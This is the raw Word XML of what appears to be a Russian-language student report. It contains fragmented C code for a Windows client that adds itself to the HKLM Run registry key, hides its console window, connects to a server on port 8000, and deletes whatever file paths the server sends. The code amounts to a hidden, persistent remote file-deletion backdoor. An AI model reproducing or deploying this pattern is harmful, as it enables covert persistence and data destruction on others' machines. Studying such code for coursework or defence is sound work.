      </w:r>
    </w:p>
    <w:p w14:paraId="0C6CE7D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HKEY_LOCAL_MACHINE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дескриптор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указанного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ключа</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4906BCCE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L"Software\\Microsoft\\Windows\\CurrentVersion\\Run"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имя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открываемого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раздела</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2286104A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0,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//зарезервировано </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2BBE7A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KEY_SET_VALUE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//права доступа(создавать, устанавливать значения)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05370EC3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&amp;hKey);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//адрес переменной, в которую возвращается дескриптор открытого ключа</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3E0A69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3222121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RegSetValueEx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//устанавливает значение параметра</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F5DD7AA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hKey,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дескриптор ключа</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E276515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L"client"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//имя устанавливаемого значения</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085DA5AF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0,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//зарезервировано</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA9CFE4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REG_SZ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//тип устанавливаемого значения(по умолчанию)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9922D7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PBYTE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)szWinPath,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указатель на значение</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69DA50BE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lstrlen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(szWinPath) *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sizeof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TCHAR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+ 1);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//размер в байтах </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77588387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14:paraId="19BAD193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RegCloseKey(hKey);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раздел</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F06ADE0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2E492A11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DF90C9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C25B37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3231E9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25B184D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0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26414994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filename[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MAXFILENAME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 0 };</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B06BB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resauto = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582100C1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526CB9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  <w:t>SetConsoleCP(1251);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5C899D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SetConsoleOutputCP(1251);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45182340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ShowWindow(GetConsoleWindow(),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SW_HIDE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скрываем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окно</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0D389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402F9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((resauto = autorun()) &lt; 0) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="516E01E1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4AE8BD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8CF3F86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1C4DF9B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WSADATA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ws;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//структура, в которую будут записаны сведения о сокете</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C314AE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(WSAStartup(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MAKEWORD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(2, 2), &amp;ws) != 0)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//инициализация сокета</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFD02BF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B5F2152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D11CC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"WSAStartup failed"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8E08A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defERROR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2EEBB8B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B9DAB45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C065EE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SOCKET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s; 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создание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</w:p>
    <w:p w14:paraId="421362EE" w14:textId="6C7A80DD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 = socket(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AF_INET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SOCK_STREAM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0);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семейство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адресов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протокол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ip),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канал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связи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TCP)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протокол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(0,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тк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af_inet)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC72DE2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3826C0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SOCKADDR_IN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sa;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//структура для параметров сокета</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053339BE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memset(&amp;sa, 0, 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(sa));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193AE506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sa.sin_family = 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AF_INET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370E578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sa.sin_port = htons(8000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1FE86D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2465CA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sa.sin_addr.S_un.S_addr = inet_addr(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11CC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IP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перевод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адреса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целое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число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строкового</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B61E3D1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bind(s, (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sockaddr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*)&amp;sa, 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(sa));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привязка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адреса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сокету</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056D9AAD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D398D7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(connect(s, (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11CC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sockaddr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*)&amp;sa, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D11CC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(sa)) &lt; 0);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установка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связи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</w:t>
      </w:r>
      <w:r w:rsidRPr="00D11CC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сервером</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489B6093" w14:textId="77777777" w:rsidR="00D11CC3" w:rsidRP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D4B388" w14:textId="77777777" w:rsidR="00D11CC3" w:rsidRPr="001931B0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1CC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(1) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F830DC" w14:textId="77777777" w:rsidR="00D11CC3" w:rsidRPr="001931B0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(recv(s, filename, </w:t>
      </w:r>
      <w:r w:rsidRPr="001931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(filename), 0) &lt; 0) </w:t>
      </w:r>
      <w:r w:rsidRPr="001931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1;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принимаем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путь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который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необходимо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удалить</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41775A90" w14:textId="77777777" w:rsidR="00D11CC3" w:rsidRPr="001931B0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result = remove(filename) + </w:t>
      </w:r>
      <w:r w:rsidRPr="001931B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успешно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ли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удаление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</w:p>
    <w:p w14:paraId="1ADA1CDB" w14:textId="77777777" w:rsidR="00D11CC3" w:rsidRPr="001931B0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send(s, &amp;result, </w:t>
      </w:r>
      <w:r w:rsidRPr="001931B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(result), 0);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отправка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результата</w:t>
      </w:r>
      <w:r w:rsidRPr="001931B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удаления</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C91CF88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931B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0D3634E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closesocket(s);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08958B72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6C133B4D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8D6DD3A" w14:textId="77777777" w:rsidR="00D11CC3" w:rsidRDefault="00D11CC3" w:rsidP="00D11CC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4931C8E" w14:textId="1B90C89E" w:rsidR="00816517" w:rsidRDefault="00816517" w:rsidP="00D11CC3">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="008165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865D3"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B6A0BD4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708A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5F5CC4C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29EC6F82"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2C6C7E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9C11202"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="29C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40E5D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="979A7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17C210C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0F42A18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D24637"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AA96B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F38E0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="FC7A77DE"/>
    <w:lvl w:ilvl="0" w:tplc="E83276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AF3154E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F55A207A"/>
    <w:lvl w:ilvl="0" w:tplc="5AB8AF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8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259"/>
    <w:rsid w:val="00003D46"/>
    <w:rsid w:val="000B4D21"/>
    <w:rsid w:val="001322E9"/>
    <w:rsid w:val="00137BB9"/>
    <w:rsid w:val="001415DE"/>
    <w:rsid w:val="00160694"/>
    <w:rsid w:val="00187803"/>
    <w:rsid w:val="001931B0"/>
    <w:rsid w:val="001A69D5"/>
    <w:rsid w:val="001D494D"/>
    <w:rsid w:val="00200B2B"/>
    <w:rsid w:val="00206598"/>
    <w:rsid w:val="00220F71"/>
    <w:rsid w:val="0024468E"/>
    <w:rsid w:val="002D3798"/>
    <w:rsid w:val="002F086E"/>
    <w:rsid w:val="0031758E"/>
    <w:rsid w:val="00336C1C"/>
    <w:rsid w:val="003453C8"/>
    <w:rsid w:val="0037585A"/>
    <w:rsid w:val="003856F5"/>
    <w:rsid w:val="003A392D"/>
    <w:rsid w:val="003B29BF"/>
    <w:rsid w:val="004026C5"/>
    <w:rsid w:val="004A3F9F"/>
    <w:rsid w:val="004A5956"/>
    <w:rsid w:val="004C30E8"/>
    <w:rsid w:val="004F1703"/>
    <w:rsid w:val="0052002F"/>
    <w:rsid w:val="00527CA1"/>
    <w:rsid w:val="005B4261"/>
    <w:rsid w:val="005E0B1F"/>
    <w:rsid w:val="005F2DA0"/>
    <w:rsid w:val="005F2F63"/>
    <w:rsid w:val="006212B8"/>
    <w:rsid w:val="006425B0"/>
    <w:rsid w:val="006500B7"/>
    <w:rsid w:val="00657CE0"/>
    <w:rsid w:val="00657FD7"/>
    <w:rsid w:val="00660FE3"/>
    <w:rsid w:val="006977D8"/>
    <w:rsid w:val="006B3844"/>
    <w:rsid w:val="006C0B77"/>
    <w:rsid w:val="006C459C"/>
    <w:rsid w:val="006C558F"/>
    <w:rsid w:val="006E171C"/>
    <w:rsid w:val="006E36E4"/>
    <w:rsid w:val="006E4EAA"/>
    <w:rsid w:val="007753D9"/>
    <w:rsid w:val="007A5066"/>
    <w:rsid w:val="007B0365"/>
    <w:rsid w:val="007B6776"/>
    <w:rsid w:val="007C27FE"/>
    <w:rsid w:val="007E2FF8"/>
    <w:rsid w:val="007F3428"/>
    <w:rsid w:val="00816517"/>
    <w:rsid w:val="008242FF"/>
    <w:rsid w:val="00833584"/>
    <w:rsid w:val="00857B38"/>
    <w:rsid w:val="00867CFE"/>
    <w:rsid w:val="00870751"/>
    <w:rsid w:val="008C0173"/>
    <w:rsid w:val="008E4848"/>
    <w:rsid w:val="009150C4"/>
    <w:rsid w:val="00922C48"/>
    <w:rsid w:val="00997D73"/>
    <w:rsid w:val="009A3A15"/>
    <w:rsid w:val="009B1A71"/>
    <w:rsid w:val="009E272A"/>
    <w:rsid w:val="00A02D80"/>
    <w:rsid w:val="00A143A8"/>
    <w:rsid w:val="00A23CDF"/>
    <w:rsid w:val="00A26BF4"/>
    <w:rsid w:val="00A42781"/>
    <w:rsid w:val="00A9563D"/>
    <w:rsid w:val="00B03F16"/>
    <w:rsid w:val="00B06927"/>
    <w:rsid w:val="00B773BD"/>
    <w:rsid w:val="00B90440"/>
    <w:rsid w:val="00B915B7"/>
    <w:rsid w:val="00B973F4"/>
    <w:rsid w:val="00BA4AA0"/>
    <w:rsid w:val="00BC740F"/>
    <w:rsid w:val="00BF6259"/>
    <w:rsid w:val="00C065DD"/>
    <w:rsid w:val="00C65DA7"/>
    <w:rsid w:val="00C82C63"/>
    <w:rsid w:val="00C95902"/>
    <w:rsid w:val="00CC7343"/>
    <w:rsid w:val="00D11CC3"/>
    <w:rsid w:val="00D50971"/>
    <w:rsid w:val="00D66DF8"/>
    <w:rsid w:val="00D73C4E"/>
    <w:rsid w:val="00DA5B76"/>
    <w:rsid w:val="00E03E7A"/>
    <w:rsid w:val="00E21639"/>
    <w:rsid w:val="00E379CE"/>
    <w:rsid w:val="00E42EB4"/>
    <w:rsid w:val="00E622FC"/>
    <w:rsid w:val="00E639DD"/>
    <w:rsid w:val="00E717C4"/>
    <w:rsid w:val="00E84DC6"/>
    <w:rsid w:val="00E87F64"/>
    <w:rsid w:val="00EA59DF"/>
    <w:rsid w:val="00EB25C4"/>
    <w:rsid w:val="00EB5B70"/>
    <w:rsid w:val="00EE4070"/>
    <w:rsid w:val="00EF58AE"/>
    <w:rsid w:val="00F12C76"/>
    <w:rsid w:val="00F60ECC"/>
    <w:rsid w:val="00F63B7D"/>
    <w:rsid w:val="00F82B33"/>
    <w:rsid w:val="00FD6ACE"/>
    <w:rsid w:val="00FE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9B00"/>
  <w15:docId w15:val="{C5D6505F-A3E9-43DA-8658-475B83D4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71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B1A71"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="a4">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="a1"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="0034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0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B973F4"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ts-comment-commentedtext">
    <w:name w:val="ts-comment-commentedtext"/>
    <w:basedOn w:val="a0"/>
    <w:rsid w:val="00B9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9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Куковякина Дарья Андреевна</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Гуторова Лилия Сергеевна</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-03-20T09:06:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-12-07T09:49:00Z</dcterms:modified>
</cp:coreProperties>
</file>